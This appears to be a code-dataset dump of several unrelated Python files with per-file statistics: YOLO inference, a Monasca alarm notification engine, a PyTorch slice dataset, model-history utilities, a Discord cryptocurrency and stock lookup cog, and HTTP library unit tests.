"spotting_disease", "snails_and_slugs"]
# deleting files in op_dir
filelist = [ f for f in os.listdir(out)]# if f.endswith(".png") ]
for f in tqdm(filelist, desc='Deleting old files from directory'):
os.remove(os.path.join(out, f))
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
if half:
model.half() # to FP16
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
# Run inference
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
#%%
for i in trange(len(img_paths)):
path = img_paths[i]
img1 = cv2.imread(path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
# get file name
name = os.path.basename(path)[:-4]
# Inference
t1 = time_synchronized()
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
if pred[0] is not None:
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
else:
boxes = np.array([10.0, 20.0, 30.0, 50.0, 0.75, 0]).reshape(1,6) # dummy values
coords_minmax = np.zeros((boxes.shape[0], 4)) # dropping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
all_bounding_boxnind = []
for i in range(boxes.shape[0]):
bounding_box = [0.0] * 6
bounding_box[0] = det_classes[i]
bounding_box[1] = confd[i]
bounding_box[2] = coords_xyminmax[i][0]
bounding_box[3] = coords_xyminmax[i][1]
bounding_box[4] = coords_xyminmax[i][2]
bounding_box[5] = coords_xyminmax[i][3]
bounding_box = str(bounding_box)[1:-1]  # remove square brackets
bounding_box = bounding_box.replace("'", '')  # remove quotes around the class name
bounding_box = "".join(bounding_box.split())  # remove all whitespace by joining on the empty string
all_bounding_boxnind.append(bounding_box)
all_bounding_boxnind = ' '.join(map(str, all_bounding_boxnind))  # convert list to string
all_bounding_boxnind = list(all_bounding_boxnind.split(' '))  # convert string back to list
# replacing commas with spaces
for i in range(len(all_bounding_boxnind)):
all_bounding_boxnind[i] = all_bounding_boxnind[i].replace(',',' ')
for i in range(len(all_bounding_boxnind)):
# check if the file exists, else make a new one
with open(out + '{}.txt'.format(name), "a+") as file_object:
# Move read cursor to the start of file.
file_object.seek(0)
# If file is not empty then append '\n'
data = file_object.read(100)
if len(data) > 0 :
file_object.write("\n")
# Append text at the end of file
file_object.write(all_bounding_boxnind[i])
#%%
import glob, random
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 300
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
img_path = random.choice(img_paths)
img1 = cv2.imread(img_path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
coords_minmax = np.zeros((boxes.shape[0], 4)) # dropping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
t = np.asarray(coords_xyminmax)
op = draw_boxes(img1, confd, t, det_classes, class_names, order='xy_minmax', analysis=False)
plt.imshow(op)
print('='*50)
print('Image Name: ', os.path.basename(img_path),img1.shape)
print('\nClass_name ', '| B_box Coords ', '| Confidence')
print('_'*50)
for k in range(len(det_classes)):
print(det_classes[k], t[k], confd[k])
print('='*50)
| 36.833333
| 135
| 0.680927
| 1,109
| 7,293
| 4.310189
| 0.267809
| 0.032218
| 0.041423
| 0.024895
| 0.38431
| 0.370502
| 0.348326
| 0.343724
| 0.323013
| 0.323013
| 0
| 0.033472
| 0.176608
| 7,293
| 198
| 136
| 36.833333
| 0.762531
| 0.124092
| 0
| 0.335616
| 0
| 0.006849
| 0.116682
| 0.070325
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006849
| false
| 0
| 0.130137
| 0
| 0.143836
| 0.10274
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b36222e5f117b24edaf10265aa3e6b8fc6c46c
| 7,351
|
py
|
Python
|
monasca/microservice/notification_engine.py
|
TeamZenith/python-monasca
|
badc86fbe2c4424deb15b84eabd3248e899ef4ee
|
[
"Apache-2.0"
] | null | null | null |
monasca/microservice/notification_engine.py
|
TeamZenith/python-monasca
|
badc86fbe2c4424deb15b84eabd3248e899ef4ee
|
[
"Apache-2.0"
] | null | null | null |
monasca/microservice/notification_engine.py
|
TeamZenith/python-monasca
|
badc86fbe2c4424deb15b84eabd3248e899ef4ee
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Carnegie Mellon University
#
# Author: Han Chen <hanc@andrew.cmu.edu>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import json
from oslo.config import cfg
from stevedore import driver
from monasca.common import es_conn
from monasca.common import email_sender
from monasca.common import kafka_conn
from monasca.openstack.common import log
from monasca.openstack.common import service as os_service
es_opts = [
cfg.StrOpt('topic',
default='alarm',
help=('The topic that messages will be retrieved from. '
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('topic2',
default='notification_methods',
help=('The topic that messages will be retrieved from. '
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('doc_type',
default='',
help=('The document type which defines what document '
'type the messages will be saved into. If not '
'specified, then the topic will be used.')),
cfg.StrOpt('processor',
default='',
help=('The message processor to load to process the message. '
'If the message does not need to be processed, '
'leave the default.')),
]
es_group = cfg.OptGroup(name='notification', title='notification')
cfg.CONF.register_group(es_group)
cfg.CONF.register_opts(es_opts, es_group)
LOG = log.getLogger(__name__)
class NotificationEngine(os_service.Service):
def __init__(self, threads=1000):
super(NotificationEngine, self).__init__(threads)
self._kafka_conn = kafka_conn.KafkaConnection(
cfg.CONF.notification.topic)
# Use doc_type if it is defined.
if cfg.CONF.notification.doc_type:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.doc_type)
else:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.topic2)
def handle_alarm_msg(self, msg):
if msg and msg.message:
LOG.debug("Message received for alarm: " + msg.message.value)
value = msg.message.value
if value:
# value's format is:
# {
# "metrics": {
# "timestamp": 1432672915.409,
# "name": "biz",
# "value": 1500,
# "dimensions": {
# "key2": "value2",
# "key1": "value1"
# }
# },
# "state_updated_timestamp": 1432672915,
# "state": "ALARM",
# "alarm-definition": {
# "alarm_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "undetermined_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "name": "Average CPU percent greater than 10",
# "match_by": [
# "hostname"
# ],
# "description": "The average CPU percent is greater than 10",
# "ok_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "expression": "max(foo{hostname=mini-mon,mu=na}, 120) > 1100
# and max(bar { asd = asd} )>1200 or avg(biz)>1300",
# "id": "c60ec47e-5038-4bf1-9f95-4046c6e91111",
# "severity": "LOW"
# }
# }
# convert to dict, and get the state to determine the actions (notification method ids) needed.
# the method id can be used to match the notification method in ElasticSearch.
# Then an email will be sent (TODO: phone/text messages are not handled for now)
dict_msg = ast.literal_eval(value)
state = dict_msg["state"]
if state not in ["ALARM","OK","UNDETERMINED"]:
LOG.error("state of alarm is not defined as expected")
return
actions = []
if state == 'ALARM':
actions = dict_msg["alarm-definition"]["alarm_actions"]
if state == 'OK':
actions = dict_msg["alarm-definition"]["ok_actions"]
if state == 'UNDETERMINED':
actions = dict_msg["alarm-definition"]["undetermined_actions"]
addresses = []
types = []
# the action_id is an id of notification method
# there can be multiple ids in one alarm message with different types
for action_id in actions:
es_res = self._es_conn.get_message_by_id(action_id)
def _get_notification_method_response(res):
if res and res.status_code == 200:
obj = res.json()
if obj:
return obj.get('hits')
return None
else:
return None
es_res = _get_notification_method_response(es_res)
LOG.debug('Query to ElasticSearch returned: %s' % es_res)
if es_res is None:
LOG.error("The provided is not defined as expected")
return
name = es_res["hits"][0]["_source"]["name"]
type = es_res["hits"][0]["_source"]["type"]
address = es_res["hits"][0]["_source"]["address"]
types.append(type)
addresses.append(address)
email_addresses = []
for i in range(len(types)):
if types[i] == "EMAIL":
email_addresses.append(addresses[i])
email_sender.send_emails(email_addresses, "Alarm to User", dict_msg["alarm-definition"]["description"])
def start(self):
while True:
try:
for msg in self._kafka_conn.get_messages():
self.handle_alarm_msg(msg)
# if autocommit is set, this will be a no-op call.
self._kafka_conn.commit()
except Exception:
LOG.exception('Error occurred while handling kafka messages.')
def stop(self):
self._kafka_conn.close()
super(NotificationEngine, self).stop()
| 39.951087
| 119
| 0.522786
| 775
| 7,351
| 4.832258
| 0.345806
| 0.012817
| 0.013885
| 0.021362
| 0.188785
| 0.126836
| 0.080641
| 0.080641
| 0.080641
| 0.055541
| 0
| 0.035146
| 0.384574
| 7,351
| 183
| 120
| 40.169399
| 0.792661
| 0.259284
| 0
| 0.158416
| 0
| 0
| 0.179844
| 0
| 0
| 0
| 0
| 0.005464
| 0
| 1
| 0.049505
| false
| 0
| 0.089109
| 0
| 0.19802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5ba81a91490ddb0a286042ea3d0c0e723e0af52
| 2,348
|
py
|
Python
|
section2/out/src/data_prep/SlicesDataset.py
|
ssheikh85/AIHCND_c3_3d_imaging
|
6502985d4199244328a683459b4d819090d58f3c
|
[
"MIT"
] | null | null | null |
section2/out/src/data_prep/SlicesDataset.py
|
ssheikh85/AIHCND_c3_3d_imaging
|
6502985d4199244328a683459b4d819090d58f3c
|
[
"MIT"
] | null | null | null |
section2/out/src/data_prep/SlicesDataset.py
|
ssheikh85/AIHCND_c3_3d_imaging
|
6502985d4199244328a683459b4d819090d58f3c
|
[
"MIT"
] | null | null | null |
"""
Module for Pytorch dataset representations
"""
import torch
from torch.utils.data import Dataset
class SlicesDataset(Dataset):
"""
This class represents an indexable Torch dataset
which could be consumed by the PyTorch DataLoader class
"""
def __init__(self, data):
self.data = data
self.slices = []
for i, d in enumerate(data):
for j in range(d["image"].shape[0]):
self.slices.append((i, j))
def __getitem__(self, idx):
"""
This method is called by PyTorch DataLoader class to return a sample with id idx
Arguments:
idx {int} -- id of sample
Returns:
Dictionary of 2 Torch Tensors of dimensions [1, W, H]
"""
slc = self.slices[idx]
sample = dict()
sample["id"] = idx
# You could implement caching strategy here if dataset is too large to fit
# in memory entirely
# Also this would be the place to call transforms if data augmentation is used
# TASK: Create two new keys in the "sample" dictionary, named "image" and "seg"
# The values are 3D Torch Tensors with image and label data respectively.
# First dimension is size 1, and last two hold the voxel data from the respective
# slices. Write code that stores the 2D slice data in the last 2 dimensions of the 3D Tensors.
# Your tensor needs to be of shape [1, patch_size, patch_size]
# Don't forget that you need to put a Torch Tensor into your dictionary element's value
# Hint: your 3D data sits in self.data variable, the id of the 3D volume from data array
# and the slice number are in the slc variable.
# Hint2: You can use None notation like so: arr[None, :] to add size-1
# dimension to a Numpy array
# <YOUR CODE GOES HERE>
img = self.data[slc[0]]["image"][slc[1]]
sample['image'] = torch.from_numpy(img[None,:])
seg = self.data[slc[0]]["seg"][slc[1]]
sample['seg'] = torch.from_numpy(seg[None,:])
return sample
def __len__(self):
"""
This method is called by PyTorch DataLoader class to return number of samples in the dataset
Returns:
int
"""
return len(self.slices)
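# Illustrative wiring with the PyTorch DataLoader mentioned in the docstrings
# (the volume list format is assumed to match what __init__ expects):
#
#     from torch.utils.data import DataLoader
#     loader = DataLoader(SlicesDataset(volumes), batch_size=8, shuffle=True)
#     for batch in loader:
#         images, masks = batch["image"], batch["seg"]   # each [N, 1, W, H]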
| 35.044776
| 103
| 0.609881
| 329
| 2,348
| 4.303951
| 0.419453
| 0.028249
| 0.04661
| 0.025424
| 0.070621
| 0.070621
| 0.070621
| 0.070621
| 0.070621
| 0.070621
| 0
| 0.010481
| 0.309199
| 2,348
| 66
| 104
| 35.575758
| 0.862515
| 0.572828
| 0
| 0
| 0
| 0
| 0.026467
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.1
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5bd90ba6b204f06ed13dd7eaecdd9ec577e33cb
| 5,512
|
py
|
Python
|
src/models/utils_func.py
|
Soufiane-Fartit/cars-prices
|
8eee8aa168251adab7f4947c45a78752e4145041
|
[
"MIT"
] | null | null | null |
src/models/utils_func.py
|
Soufiane-Fartit/cars-prices
|
8eee8aa168251adab7f4947c45a78752e4145041
|
[
"MIT"
] | null | null | null |
src/models/utils_func.py
|
Soufiane-Fartit/cars-prices
|
8eee8aa168251adab7f4947c45a78752e4145041
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""" This module offers util functions to be called and used
in other modules
"""
from datetime import datetime
import os
import json
import pickle
import string
import random
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import tree
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
"""GENERATE A RANDOM STRING TO BE USED AS AN ID
Args:
size (int, optional): size of the string. Defaults to 6.
chars (str, optional): characters to be used to generate the string.
Defaults to string.ascii_lowercase+string.digits.
Returns:
[str]: a random string of characters
"""
return "".join(random.choice(chars) for _ in range(size))
def save_model(path, model):
"""SAVE MODEL INTO PICKLE FILE
Args:
path (str): path where to save the model
model (binary): the model to be saved
"""
with open(path, "wb") as file:
pickle.dump(model, file)
def update_history(models_hist_path, model_id, model_name, model, params):
"""SAVE METADATA RELATED TO THE TRAINED MODEL INTO THE HISTORY FILE
Args:
models_hist_path (str): path to the history file
model_id (str): unique id of the model
model_name (str): model name = "model_"+model_id+".pkl"
model (binary): binary file of the model
params (dict): dictionary containing the hyper-parameters
used to fit the model
"""
model_metadata = dict()
model_metadata["trained"] = str(datetime.now())
model_metadata["model_type"] = type(model).__name__
model_metadata["model_id"] = model_id
model_metadata["params"] = params
print(model_metadata)
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name] = model_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
json.dump({model_name: model_metadata}, outfile, indent=4)
def update_history_add_eval(
models_hist_path, model_id=None, model_name=None, metrics=None
):
"""ADD EVALUATION METRICS THE HISTORY FILE FOR THE SPECIFIED MODEL
Args:
models_hist_path (str): path to the history file
model_id (str, optional): the id of the model. Defaults to None.
model_name (str, optional): the name of the model. Defaults to None.
metrics (dict, optional): a dictionary containing metadata related
to the model evaluation. Defaults to None.
"""
assert (
model_id is not None or model_name is not None
), "At least the model id or name must be given"
assert models_hist_path is not None, "You must specify the path to the history file"
if not model_name:
model_name = "model_" + model_id + ".pkl"
eval_metadata = dict()
eval_metadata["datetime"] = str(datetime.now())
eval_metadata["metrics"] = metrics
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name]["evaluation"] = eval_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
print("cannot save evaluation metadata")
def generate_features_importance_plot(model, features, model_id):
"""GENERATES A PLOT DESCRIBING FEATURES IMPORTANCE FOR THE MODEL
TO MAKE THE PREDICTION.
Args:
model (tree-based model): a tree based model (decision tree, random forest ...)
features (pandas dataframe): a table of the features on which we trained the model
model_id (str): the unique id of the model
"""
mean_importances = model.feature_importances_
importances_indices = np.argsort(mean_importances)[::-1]
ordered_columns = [features.columns[i] for i in importances_indices]
importances = pd.DataFrame(
[tree.feature_importances_ for tree in model.estimators_],
columns=features.columns,
)
importances = importances[ordered_columns]
_, ax = plt.subplots(figsize=(12, 8))
sns.boxplot(x="variable", y="value", ax=ax, data=pd.melt(importances))
figure = ax.get_figure()
figure.savefig(
"models/models-training/run_" + model_id + "/features_importance.png"
)
def plot_trees(rf, feature_names, target_names, model_id):
"""GENERATES A PLOT THAT SHOWS THE DECISION MAKING OF THE TREES
Args:
rf (model): a tree based model (random forest ...)
feature_names (list): names of the columns of the training set
target_names (str): name of the target columns
model_id (str): unique id of the model
"""
fn = feature_names
cn = target_names
fig, axes = plt.subplots(nrows=1, ncols=5, figsize=(10, 2), dpi=900)
for index in range(0, 5):
tree.plot_tree(
rf.estimators_[index],
feature_names=fn,
class_names=cn,
filled=True,
ax=axes[index],
)
axes[index].set_title("Estimator: " + str(index), fontsize=11)
fig.savefig("models/models-training/run_" + model_id + "/Trees.png")
def get_id_list(N=6):
print(os.getcwd())
print([x[0] for x in os.walk("../../models/models-training")])
return [x[0][-N:] for x in os.walk("../../models/models-training")][1:]
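# Sketch of the intended flow tying these helpers together (paths, model and
# params are assumptions):
#
#     model_id = id_generator()
#     save_model("models/model_" + model_id + ".pkl", model)
#     update_history("models/history.json", model_id,
#                    "model_" + model_id + ".pkl", model,
#                    params={"n_estimators": 100})
#     update_history_add_eval("models/history.json", model_id=model_id,
#                             metrics={"r2": 0.9})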
| 33.815951
| 90
| 0.649492
| 747
| 5,512
| 4.658635
| 0.263722
| 0.032184
| 0.028161
| 0.013793
| 0.267816
| 0.193103
| 0.165517
| 0.144253
| 0.112644
| 0.112644
| 0
| 0.006775
| 0.250181
| 5,512
| 163
| 91
| 33.815951
| 0.835229
| 0.347424
| 0
| 0.142857
| 0
| 0
| 0.10565
| 0.039435
| 0
| 0
| 0
| 0
| 0.02381
| 1
| 0.083333
| false
| 0
| 0.238095
| 0
| 0.345238
| 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c0292ca1d781849b4c6bb27642731423800d86
| 7,504
|
py
|
Python
|
modules/finance.py
|
KpaBap/palbot
|
38d2b7958e310f45a28cf1b3173967b92f819946
|
[
"MIT"
] | null | null | null |
modules/finance.py
|
KpaBap/palbot
|
38d2b7958e310f45a28cf1b3173967b92f819946
|
[
"MIT"
] | null | null | null |
modules/finance.py
|
KpaBap/palbot
|
38d2b7958e310f45a28cf1b3173967b92f819946
|
[
"MIT"
] | null | null | null |
import asyncio
import discord
from discord.ext import commands
import re
import sqlite3
from urllib.parse import quote as uriquote
import html
CURR = ["AUD", "BRL", "CAD", "CHF", "CLP", "CNY", "CZK", "DKK", "EUR",
"GBP", "HKD", "HUF", "IDR", "ILS", "INR", "JPY", "KRW", "MXN",
"MYR", "NOK", "NZD", "PHP", "PKR", "PLN", "RUB", "SEK", "SGD",
"THB", "TRY", "TWD", "ZAR"]
class Finance(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def coin(self, ctx, *, line: str):
"""Look up a cryptocurrency such as Bitcoin
Optionally specify a quantity such as `0.6 ETH`
Optionally specify a conversion value such as `2 BTC in ETH` or `ETH in CAD`"""
coin = await self.parse_coinline(line)
if not coin:
await ctx.send(f"Unable to find coin {line}")
return
url = f"https://api.coinmarketcap.com/v1/ticker/{coin['coin']}{coin['currency']}"
async with self.bot.session.get(url) as resp:
data = await resp.json()
data = data[0]
cid = data['symbol'].upper()
name = data['name']
pUSD = data['price_usd']
pC24 = data['percent_change_24h']
pC1 = data['percent_change_1h']
output = ""
if coin.get('cvtto', ''):
cvtval = await self.convert_coin(coin, data)
if not cvtval:
await ctx.send(f"Failed to look up {coin['cvtto']}")
return
if coin['qty'] == 1:
output = "{} {} | Value: {} {} (${} USD) | 1-hour change: {}% | 24-hour change: {}%".format(cid, name, cvtval, coin['cvtto'].upper(), pUSD, pC1, pC24)
else:
usdfinal = float(pUSD) * coin['qty']
output = "{} {} : {} {} (${:.2f} USD)".format(coin['qty'], cid, cvtval, coin['cvtto'].upper(), usdfinal)
else:
if coin['qty'] == 1:
output = "{} {} | Value: ${} | 1-hour change: {}% | 24-hour change: {}%".format(cid, name, pUSD, pC1, pC24)
else:
finalprice = float(pUSD) * coin['qty']
output = "{} {} : ${:.2f}".format(coin['qty'], cid, finalprice)
if output:
await ctx.send(output)
async def convert_coin(self, coin, data):
if coin['currency']:
cvtval = "{:.2f}".format(float(data['price_{}'.format(coin['cvtto'].lower())]) * coin['qty'])
else:
if not coin['cvtto']:
cvtval = ''
if coin['cvtto'] == "bitcoin":
# API gives us BTC by default
cvtval = self.ffstr(float(data['price_btc']) * coin['qty'])
coin['cvtto'] = "BTC"
else:
pUSD = data['price_usd']
url = "https://api.coinmarketcap.com/v1/ticker/{}".format(coin['cvtto'])
async with self.bot.session.get(url) as resp:
tojson = await resp.json()
coin['cvtto'] = tojson[0]['symbol'].upper()
toval = float(tojson[0]['price_usd'])
cvtval = self.ffstr((float(pUSD) * coin['qty']) / toval)
return cvtval
def ffstr(self, number):
return "{:.8f}".format(float(number)).rstrip('0').rstrip('.')
async def parse_coinline(self, line):
coinqty = 1
qtycheck = re.search(r"(^(\d*\.)?\d+)\s?(\w.+)", line)
if qtycheck:
coinqty = float(qtycheck.group(1))
line = qtycheck.group(3).strip()
curr = ""
cvtto = ""
if " in " in line or " to " in line:
if " in " in line:
coin, cvtto = line.split(" in ")
elif " to " in line:
coin, cvtto = line.split(" to ")
coinid = await self.findcoin(coin)
if cvtto.upper() in CURR:
curr = "?convert={}".format(cvtto)
else:
cvtto = await self.findcoin(cvtto)
else:
coin = line
coinid = await self.findcoin(coin)
if not coinid:
return None
return {'coin': coinid,
'qty': coinqty,
'currency': curr,
'cvtto': cvtto}
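# For example (illustrative; real ids come from the coins.sqlite3 lookup):
# "2 BTC in ETH" would yield roughly
# {'coin': 'bitcoin', 'qty': 2.0, 'currency': '', 'cvtto': 'ethereum'},
# while "0.6 eth" yields the coin id with qty 0.6 and empty conversion fields.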
async def findcoin(self, coin):
conn = sqlite3.connect("coins.sqlite3")
cursor = conn.cursor()
result = cursor.execute("SELECT coinid FROM coins WHERE coinid = (?) OR symbol = (?)", (coin, coin)).fetchone()
if not result:
like = "%{}%".format(coin)
result = cursor.execute("SELECT coinid FROM coins WHERE name LIKE (?)", [like]).fetchone()
if result:
return result[0]
@commands.command(hidden=True)
@commands.is_owner()
async def newcoins(self, ctx):
conn = sqlite3.connect("coins.sqlite3")
cursor = conn.cursor()
result = cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='coins';").fetchone()
if not result:
cursor.execute("CREATE TABLE 'coins' ('symbol' TEXT, 'coinid' TEXT UNIQUE ON CONFLICT REPLACE, 'name' TEXT);")
conn.commit()
url = "https://api.coinmarketcap.com/v1/ticker/?limit=0"
async with self.bot.session.get(url) as resp:
data = await resp.json()
for coin in data:
sym = coin['symbol'].lower()
cid = coin['id'].lower()
name = coin['name'].lower()
cursor.execute("insert into coins values (?, ?, ?)", (sym,cid,name))
conn.commit()
conn.close()
@commands.command(aliases=['stonks', 'stocks'])
async def stock(self, ctx, name: str):
"""Look up a stock and show its current price, change, etc"""
symbol = ""
url = f"https://autoc.finance.yahoo.com/autoc?query={uriquote(name)}®ion=1&lang=en&guccounter=1"
async with self.bot.session.get(url) as resp:
data = await resp.json()
symbol = data['ResultSet']['Result'][0]['symbol']
if not symbol:
await ctx.send(f"Unable to find a stonk named `{name}`")
return
url = f"http://query1.finance.yahoo.com/v7/finance/quote?symbols={symbol}"
async with self.bot.session.get(url) as resp:
data = await resp.json()
data = data["quoteResponse"]["result"][0]
downup = "\N{CHART WITH UPWARDS TREND}" if data['regularMarketChange'] > 0 else "\N{CHART WITH DOWNWARDS TREND}"
outstr = "{}{}: {} {} :: Today's change: {:.2f} ({:.2f}%) {}"
longn = ' ({})'.format(data['shortName']) if 'shortName' in data else ''
outstr = outstr.format(data['symbol'], longn, data['regularMarketPrice'], data['currency'],
float(data['regularMarketChange']), float(data['regularMarketChangePercent']),
downup)
if 'postMarketPrice' in data and (data['marketState'] == "CLOSED" or "POST" in data['marketState']):
pdu = "\N{CHART WITH UPWARDS TREND}" if data['postMarketChange'] > 0 else "\N{CHART WITH DOWNWARDS TREND}"
outstr += " :: After Hours: {:.2f} - Change: {:.2f} {}".format(data['postMarketPrice'],
data['postMarketChange'], pdu)
await ctx.send(html.unescape(outstr))
def setup(bot):
bot.add_cog(Finance(bot))
| 40.344086
| 166
| 0.518124
| 853
| 7,504
| 4.534584
| 0.277843
| 0.025595
| 0.015512
| 0.020683
| 0.261634
| 0.261634
| 0.202689
| 0.157187
| 0.122285
| 0.094623
| 0
| 0.010974
| 0.319963
| 7,504
| 185
| 167
| 40.562162
| 0.747012
| 0.003598
| 0
| 0.22
| 0
| 0.02
| 0.245019
| 0.006779
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02
| false
| 0
| 0.046667
| 0.006667
| 0.126667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5c1a9c69d580b85cf1676ca01e443acef7eb239
| 9,048
|
py
|
Python
|
pyx/tests/test_http.py
|
l04m33/pyx
|
b70efec605832ba3c7079e991584db3f5d1da8cb
|
[
"MIT"
] | 2
|
2015-08-25T11:31:42.000Z
|
2015-10-16T11:30:15.000Z
|
pyx/tests/test_http.py
|
l04m33/pyx
|
b70efec605832ba3c7079e991584db3f5d1da8cb
|
[
"MIT"
] | null | null | null |
pyx/tests/test_http.py
|
l04m33/pyx
|
b70efec605832ba3c7079e991584db3f5d1da8cb
|
[
"MIT"
] | null | null | null |
import unittest
import unittest.mock as mock
import asyncio
import pyx.http as http
def create_dummy_message():
msg = http.HttpMessage(None)
msg.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Cookie', 'a'),
http.HttpHeader('Cookie', 'b'),
]
return msg
def create_dummy_connection():
loop = asyncio.get_event_loop()
reader = asyncio.StreamReader(loop=loop)
@asyncio.coroutine
def dummy_drain():
yield from asyncio.sleep(0.001)
writer = mock.Mock(spec=asyncio.StreamWriter)
writer.attach_mock(mock.Mock(wraps=dummy_drain), 'drain')
conn = http.HttpConnection(reader, writer)
return conn
def create_dummy_request():
conn = create_dummy_connection()
req = http.HttpRequest(conn)
return req
class TestHttpMessage(unittest.TestCase):
def test_get_header(self):
msg = create_dummy_message()
self.assertEqual(msg.get_header("server"), ["Pyx"])
self.assertEqual(msg.get_header("SERVER"), ["Pyx"])
self.assertEqual(msg.get_header("pragma"), [])
self.assertEqual(msg.get_header("cookie"), ["a", "b"])
self.assertEqual(msg.get_first_header("cookie"), "a")
self.assertTrue(msg.get_first_header("pragma") is None)
def test_write_headers(self):
msg = create_dummy_message()
self.assertEqual(msg.write_headers(),
['Server: Pyx', 'Cookie: a', 'Cookie: b'])
msg.headers = []
self.assertEqual(msg.write_headers(), [])
class TestHttpRequest(unittest.TestCase):
def test_parse_req_line(self):
req = create_dummy_request()
req._parse_req_line(b'POST / HTTP/1.1\r\n')
self.assertEqual(req.method, 'POST')
self.assertEqual(req.path, '/')
self.assertTrue(req.query is None)
self.assertEqual(req.protocol, 'HTTP')
self.assertEqual(req.version, (1, 1))
req._parse_req_line(
b'GET /some/path?some=query&some_other=query HTTP/1.1\r\n')
self.assertEqual(req.method, 'GET')
self.assertEqual(req.path, '/some/path')
self.assertEqual(req.query, 'some=query&some_other=query')
with self.assertRaises(http.BadHttpRequestError):
